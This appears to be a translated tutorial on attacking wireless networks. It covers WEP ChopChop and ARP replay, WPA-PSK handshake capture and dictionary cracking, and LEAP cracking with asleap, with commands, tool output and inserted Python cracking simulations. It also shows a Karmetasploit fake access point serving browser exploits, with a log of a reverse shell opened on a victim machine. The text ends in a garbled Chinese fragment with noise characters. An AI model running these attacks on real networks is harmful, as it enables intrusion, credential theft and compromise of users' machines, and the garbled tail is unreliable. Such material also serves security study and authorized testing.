[0x05e] - KoreK ChopChop attack

A guy called KoreK developed a tricky attack method called ChopChop. It needs only one captured encrypted packet: that packet is decrypted to obtain the keystream, the keystream is used to build an ARP request packet, and finally an ARP replay attack is run with that packet.

To use the ChopChop attack, type the following command (aireplay-ng will pick a packet to decrypt):

#aireplay-ng -4 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy rausb0
The response looks like this:

21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11

Size: 90, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6

0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K...
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72                .........r

Use this packet ?

We type "y".

Use this packet ? y

aireplay-ng then starts decrypting the packet one byte at a time, from the end:

Saving chosen packet in replay_src-0223-211242.cap

Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms

The AP appears to drop packets shorter than 37 bytes.
Enabling standard workaround: IP header re-creation.

This doesn't look like an IP packet, try another one.

Warning: ICV checksum verification FAILED! Trying workaround.
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.

Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor

Completed in 21s (2.48 bytes/s)

The attack produces two files: the .xor file contains the keystream (PRGA) and the .cap file contains the decrypted packet. Note in the output above that aireplay-ng could not chop the first bytes of the packet, because the AP drops packets that short; it recovered them from the known IP header instead.

[0x05f] - Packet forging

Now we build an encrypted packet from the PRGA (the .xor keystream file) obtained with ChopChop or with the fragmentation attack. packetforge-ng -0 builds an ARP request: -k and -l are the destination and source IP addresses, -y is the keystream file and -w the output file.

#packetforge-ng -0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0223-211410.xor -w arp

The result is:

Wrote packet to: arp

From this command we get an ARP request packet saved in the file "arp".
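Added example (not code from the original article and not from aircrack-ng): a Python simulation of what [0x05e] and [0x05f] do, runnable offline. The "AP" is a local oracle that holds a constructed WEP key and answers only accept or reject, which is exactly the feedback the real attack gets from the access point. The attacker side sees one captured frame, recovers the keystream a byte at a time with the ChopChop CRC trick, fills in the head bytes the AP will not let it chop by recreating the IP header, and then forges an ARP request from that keystream the way packetforge-ng does. The key, IV, frame contents, IP addresses and the 8-byte minimum frame length are constructed for the demo; the source MAC of the forged frame reuses the client address seen in the captures above.

```python
import zlib

def rc4(key: bytes, n: int) -> bytes:
    """First n RC4 keystream bytes (WEP keys RC4 with IV || secret key)."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP ICV: CRC-32 of the plaintext, appended little-endian."""
    return zlib.crc32(data).to_bytes(4, "little")

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    """Frame body as sent over the air: IV || RC4(IV || key) XOR (data || ICV)."""
    body = data + icv(data)
    return iv + xor(body, rc4(iv + key, len(body)))

MIN_DATA = 8  # constructed AP behaviour: frames with under 8 data bytes are dropped

def make_ap(key: bytes):
    """Oracle standing in for the A
    P: accepts iff the frame decrypts to a valid ICV and is long enough."""
    def accepts(frame: bytes) -> bool:
        iv, body = frame[:3], frame[3:]
        if len(body) < MIN_DATA + 4:
            return False
        pt = xor(body, rc4(iv + key, len(body)))   # the attacker never sees `key`
        return icv(pt[:-4]) == pt[-4:]
    return accepts

# ChopChop: CRC-32 is affine over GF(2), so after dropping the last byte of a valid
# (data || ICV) the 4-byte fix-up that makes the shorter frame valid depends only on
# the plaintext of the dropped byte: 256 candidates, and the AP reveals the right one.
CRC_TABLE = []
for n in range(256):
    c = n
    for _ in range(8):
        c = (c >> 1) ^ (0xEDB88320 if c & 1 else 0)
    CRC_TABLE.append(c)
INV_TOP = {t >> 24: n for n, t in enumerate(CRC_TABLE)}  # top byte -> table index
assert len(INV_TOP) == 256  # the high bytes of the CRC-32 table are all distinct

def chop_correction(guess: int) -> bytes:
    """XOR mask for the new last four bytes if the dropped byte's plaintext is `guess`."""
    lo = INV_TOP[guess ^ 0xFF]
    return (((CRC_TABLE[lo] & 0xFFFFFF) << 8) | (lo ^ 0xFF)).to_bytes(4, "little")

def chopchop(frame: bytes, accepts) -> dict:
    """Return {body offset: keystream byte} for every offset the oracle lets us reach."""
    iv, body = frame[:3], bytearray(frame[3:])
    keystream = {}
    while len(body) > MIN_DATA + 4:
        pos = len(body) - 1
        for guess in range(256):              # one injected frame per guess
            cand = bytearray(body[:-1])
            cand[-4:] = xor(cand[-4:], chop_correction(guess))
            if accepts(iv + bytes(cand)):
                keystream[pos] = body[pos] ^ guess   # aireplay-ng's "xor = .. | pt = .."
                body = cand
                break
        else:
            raise RuntimeError(f"no candidate accepted at offset {pos}")
    return keystream

def complete_keystream(frame: bytes, keystream: dict) -> bytes:
    """The AP drops frames short enough to chop the head, so take the head keystream from
    known plaintext (LLC/SNAP, IP version/TOS, IP total length): 'IP header re-creation'."""
    body = frame[3:]
    ip_len = len(body) - 4 - 8               # data length minus the LLC/SNAP header
    known = bytes.fromhex("aaaa030000000800") + b"\x45\x00" + ip_len.to_bytes(2, "big")
    for i, p in enumerate(known):
        keystream.setdefault(i, body[i] ^ p)
    return bytes(keystream[i] for i in range(len(body)))

def forge_arp_request(iv: bytes, ks: bytes, src_mac: bytes, src_ip: bytes, dst_ip: bytes) -> bytes:
    """packetforge-ng style: a fresh ARP request encrypted under the same IV with the
    recovered keystream; the ICV is computed over our plaintext, so the AP accepts it."""
    arp = (bytes.fromhex("aaaa030000000806")          # LLC/SNAP, ethertype ARP
           + bytes.fromhex("0001080006040001")        # Ethernet/IPv4, hlen 6, plen 4, request
           + src_mac + src_ip + b"\x00" * 6 + dst_ip)
    body = arp + icv(arp)
    return iv + xor(body, ks)                 # needs len(body) <= len(ks)

def demo() -> dict:
    key, iv = bytes.fromhex("0011223344"), bytes.fromhex("608400")   # constructed key and IV
    accepts = make_ap(key)
    # constructed captured frame: LLC/SNAP + 20-byte IPv4 header + 20 bytes of payload
    data = (bytes.fromhex("aaaa030000000800")
            + bytes.fromhex("450000281234000040017a3fc0a80101c0a80102") + bytes(range(20)))
    captured = wep_encrypt(key, iv, data)
    ks = complete_keystream(captured, chopchop(captured, accepts))
    forged = forge_arp_request(iv, ks, bytes.fromhex("002127c00771"), bytes(4), bytes([255] * 4))
    return {"keystream_ok": ks == rc4(iv + key, len(ks)),
            "plaintext_ok": xor(captured[3:], ks)[:-4] == data,
            "forged_accepted": accepts(forged)}
```

demo() returns three booleans: the recovered keystream equals the real RC4 output, the recovered plaintext equals the original packet, and the forged ARP request passes the AP's ICV check. The point to take from chop_correction() is that the fix-up is a function of the guessed plaintext byte alone, which is why the AP serves as a 256-way oracle and why each byte costs up to 256 injected frames (the "frames written" counts in the aireplay-ng output above).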
[0x05g] - Interactive ARP replay attack

We use aireplay-ng to inject the forged ARP request packet toward the access point with the following command:

#aireplay-ng -2 -r arp rausb0

The response looks like this:

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71

0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e                               f.p.

Use this packet ?

We answer "y".

Use this packet ? y

aireplay-ng starts injecting the packet:

Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.

Sent 1200 packets...(499 pps)

[0x05h] - Cracking the WEP key

Once enough encrypted packets (unique IVs) have been collected, we use aircrack-ng to recover the key. -z selects the PTW attack, which needs far fewer IVs than the older FMS/KoreK statistical attacks:

#aircrack-ng -z capture1.cap

A successful crack looks like this:

Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%

[0x06] - WEP cracking summary script

Note: $AP is the MAC address of the access point, $WIFI is the MAC address of the wireless card.

- airmon-ng start wlan0 11 (monitor mode must be locked to the target channel)
- airodump-ng -c 11 -w capture1.cap wlan0
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
- aireplay-ng -4 -b $AP -h $WIFI wlan0
  If it does not work, try: aireplay-ng -5 -b $AP -h $WIFI wlan0
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request
- aireplay-ng -2 -r arp-request wlan0
- aircrack-ng -z capture1.cap

** These methods can be used for WEP cracking with clients.

[0x07] - Owning the WPA-PSK/WPA2-PSK key

PSK stands for Pre-Shared Key. WPA-PSK and WPA2-PSK were designed to fix the weaknesses of WEP, so the WEP cracking methods above do not work against them. The only way to recover a WPA-PSK or WPA2-PSK key is to capture the four-way handshake and run a dictionary attack against it.

So the idea of cracking the pre-shared key is to collect the four-way handshake. We can do that by deauthenticating an associated client: this forces the client to re-authenticate, and during that process we capture the four-way handshake. The deauthentication command looks like this:

#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0

21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]

Suppose we captured the handshake during this process into the file workshop-02.cap. We then use aircrack-ng with a wordlist to crack it:

#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap

A successful result looks like this:

Opening test-02.cap
Read 252 packets.

# BSSID ESSID Encryption

1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)

Choosing first network as target.

Opening workshop-02.cap
Reading packets, please wait...

Aircrack-ng 1.0 rc1 r1085

[00:00:00] 0 keys tested (0.00 k/s)

KEY FOUND! [ TheFuckinWPAKey ]

Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63

Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1

EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D

This result shows that the WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey". The Master Key is the PMK derived from the passphrase and the SSID, the Transcient Key is the PTK derived from the PMK and the handshake's nonces and MAC addresses, and the EAPOL HMAC is the handshake MIC that aircrack-ng matched against the capture.

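Added example (not the article's code and not aircrack-ng's): the computation behind the "Master Key", "Transcient Key" and "EAPOL HMAC" lines, in Python with only the standard library. A handshake is constructed from a known passphrase (BSSID and client MAC taken from the captures earlier in the article; nonces and the EAPOL-Key message 2 frame are made up here) and then cracked with a constructed wordlist, which is the dictionary attack aircrack-ng runs: PBKDF2 to the PMK, PRF-512 to the PTK, an HMAC over the EAPOL frame to the MIC, compared with the MIC captured in the handshake.

```python
import hashlib
import hmac

def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    This is the 'Master Key' aircrack-ng prints, and the expensive step of the attack."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]

def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK ('Transcient Key') from the PMK plus the MAC addresses and nonces of the handshake.
    Both nonces travel in clear, so an eavesdropper lacks only the PMK."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 64)

MIC_OFFSET = 81   # offset of the Key MIC field inside an EAPOL-Key frame

def eapol_mic(kck: bytes, eapol: bytes, version: int) -> bytes:
    """Key MIC over the EAPOL-Key frame with the MIC field zeroed: HMAC-MD5 for key
    descriptor version 1 (WPA/TKIP), HMAC-SHA1 for version 2 (WPA2/CCMP); 16 bytes kept."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    digest = hashlib.md5 if version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:16]

def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, version: int = 2) -> bytes:
    """Message 2 of the 4-way handshake with the real field layout (MIC lands at offset 81).
    Constructed for the demo; in practice the frame comes from airodump-ng's .cap file."""
    key_info = (0x0108 | version).to_bytes(2, "big")        # pairwise + MIC bits + descriptor version
    body = (b"\x02" + key_info + b"\x00\x10" + (1).to_bytes(8, "big")   # type, key info, key len, replay ctr
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8           # SNonce, key IV, RSC, key ID
            + mic + b"\x00\x00")                                          # MIC, key data length 0
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body              # 802.1X: version, EAPOL-Key, length

def crack_psk(ssid, aa, spa, anonce, snonce, eapol, version, wordlist):
    """The dictionary attack: derive PMK -> PTK -> KCK -> MIC for each candidate and
    compare with the MIC in the captured frame.  Returns the passphrase or None."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:          # WPA passphrases are 8..63 characters
            continue
        kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, version), captured_mic):
            return candidate
    return None

# Constructed handshake: BSSID and client MAC are the ones seen in the article's captures,
# nonces, passphrase and wordlist are made up for the demo.
SSID = "Workshop"
AA = bytes.fromhex("001b2f3dcbd6")
SPA = bytes.fromhex("002127c00771")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "linksys", "workshop123", "TheFuckinWPAKey", "12345678"]

def make_handshake(passphrase: str, version: int = 2) -> bytes:
    """What the client would transmit as message 2: the frame with a valid MIC under `passphrase`."""
    kck = derive_ptk(derive_pmk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE, version=version)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned, version), version)

def demo(passphrase: str = "TheFuckinWPAKey", wordlist=WORDLIST, version: int = 2):
    """Capture a constructed handshake and run the dictionary attack against it."""
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, make_handshake(passphrase, version), version, wordlist)
```

demo() returns the recovered passphrase, or None when the wordlist does not contain it. PBKDF2 with 4096 rounds is the cost that makes the wordlist size matter: everything after the PMK is a handful of HMACs, so a precomputed PMK table for a common SSID (what coWPAtty's genpmk builds) removes most of the work, while a long random passphrase defeats the attack outright because no wordlist contains it.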
[0x08] - Wireless enterprise exploitation (WPA-TLS/TTLS/PEAP)

Most companies move to wireless networks that use public-key cryptography (certificates) and believe this to be absolutely secure. But a cunning attacker can still attack such a system by spoofing the certificate.

This attack exploits the client side. Many clients accept the authentication without checking whether the certificate is genuine, or even with no certificate at all. This lets the attacker impersonate the RADIUS server and log the victim's login credentials.

We can use FreeRADIUS with the WPE patch as a rogue RADIUS server that logs the credentials it receives. Further details: http://www.willhackforsushi.com/FreeRADIUS_WPE.html

[0x09] - Cisco LEAP exploitation

Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) is a wireless authentication scheme intended to close security holes: it provides user-based authentication and generates dynamic WEP keys. Cisco LEAP is an 802.1X Extensible Authentication Protocol (EAP) type.

LEAP is easy to deploy and manage, with features such as:
- mutual authentication
- user-based authentication
- dynamic WEP keys

This article is reposted from 神秘小强's blog (QQ group: 29097418).

We find that the username is sent to the RADIUS server in clear text, and although the password captured in Wireshark is encrypted (an MS-CHAP style challenge/response), it is still easy to exploit. asleap is a tool that recovers weak LEAP and PPTP passwords. asleap can:

- recover weak LEAP and PPTP passwords
- deauthenticate clients from the WLAN (to speed up LEAP password recovery), using the AirJack driver

Download asleap: http://asleap.sourceforge.net/

The first step is to use genkeys (shipped with asleap) to build the required lookup database (.dat) and index file (.idx):

#./genkeys -r dict -f dict.dat -n dict.idx

dict = our wordlist/dictionary file, with one word per line
dict.dat = our new output pass+hash file (generated as a result of running this command)
dict.idx = our new output index file (generated as a result of running this command)

#./genkeys -r dictionary -f dict.dat -n dict.idx

genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.

The last step is to recover the weak LEAP password: run asleap against the capture using the .dat and .idx files just created:

#./asleap -r data/leap.dump -f dict.dat -n dict.idx

leap.dump = our libpcap packet capture file (NOTE: any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = our pass+hash file (generated with genkeys, see above)
dict.idx = our index file (generated with genkeys, see above)

#./asleap -r data/leap.dump -f dict.dat -n dict.idx

asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...

The "hash bytes" line is the last two bytes of the NT hash: the third DES key of the MS-CHAP response is built from those two bytes plus five bytes of zero padding, so asleap brute-forces them from the last 8 bytes of the response (2^16 possibilities) and then only has to look up dictionary entries whose NT hash ends in those bytes.

Note: the success rate depends on the size of the dictionary.

asleap 2.2 and later also have the "-C" and "-R" options to supply the challenge and response directly as colon-separated hex bytes. With those options asleap becomes a generic MS-CHAPv2 cracking tool.

[0x10] - Mass exploitation with Karmetasploit

HD Moore published instructions (http://trac.metasploit.com/wiki/Karmetasploit) for getting Karmetasploit working with the framework.

Karmetasploit brings up a fake AP and lets clients connect to it. The attacker can then record cookies, FTP and HTTP credentials, authentication data and so on, and can also exploit browser vulnerabilities on the client machines.

This method was tested on BackTrack 3 (final).

1. Update aircrack-ng

$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ cd aircrack-ng
$ make
# make install

2. Test that aireplay-ng injection works (your wireless card must support packet injection):

bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs

15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%

Injection is working now!

3. Update Metasploit

$ svn co http://metasploit.com/svn/framework3/trunk msf3

4. Download the bash script: http://www.darkoperator.com/kmsapng.tgz

The script does the following:
- changes the MAC address of the interface
- puts the interface in monitor mode
- starts the Karma AP with airbase-ng
- changes the interface MTU
- sets the IP address
- starts the DHCP server
- sets up iptables redirection
- starts Metasploit

5. Then we run kmsapng.sh like this:

#./kmsapng.sh -i wlan0 -m km -s linksys

Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ...
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.

[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)

msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

D:\Mozilla Firefox> cd ..

D:\> net user

User accounts for \\CZY

-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CZY CZY SUPPORT_388945a0
The command completed successfully.

[0x11] - End of the journey

All of this was done in a Linux environment. In any case, I hope it is useful to you.

This article is written for exchanging techniques and for legal penetration testing purposes; the author is not responsible for any damage caused by using its contents. If you want to use these techniques on other people's systems, you must have their consent or a legal penetration testing engagement.
B[d%?L_
有一个家伙 KoreK 开发了一个棘手的***方法,称为 ChopChop。它要求只有一个加密的数据包用来解密获取的密钥流,然后使用密钥流生成 ARP 请求数据包,并最终执行 ARP 协议重播***。 rx@2Dmt6
我们使用 ChopChop ***,可以键入如下所示命令: ^OK;s wDW
